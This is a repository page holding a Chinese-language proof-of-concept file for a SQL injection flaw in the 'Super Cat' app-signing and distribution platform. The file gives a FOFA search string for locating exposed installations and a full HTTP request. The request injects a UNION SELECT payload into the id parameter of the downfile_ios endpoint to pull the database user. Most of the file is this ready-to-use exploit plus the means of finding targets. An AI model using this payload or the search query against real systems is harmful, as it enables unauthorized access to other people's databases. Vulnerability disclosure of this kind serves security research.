admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/超级猫签名APP分发平台前台存在SQL注入漏洞.md

27 lines
1017 B
Markdown
Raw Permalink Normal View History

727更新漏洞
2024-07-27 12:13:07 +08:00
# 超级猫签名APP分发平台前台存在SQL注入漏洞
超级猫超级签名分发平台是一个安卓苹果APP分发平台能够对所有安卓苹果的APP进行签名分发使所有自行开发的APP能够签名使用包括登录注册等功能还提供有SDK
## fofa
```java
"/themes/97013266/public/static/css/pc.css"
```
## poc
```yaml
GET /user/install/downfile_ios?id=') UNION ALL SELECT NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 127.0.0.1:81
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
```
![image-20240727115946636](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407271159715.png)
## 漏洞来源
- https://mp.weixin.qq.com/s/xTcnm_fFubFCYw4LhIXwkQ
Reference in New Issue Copy Permalink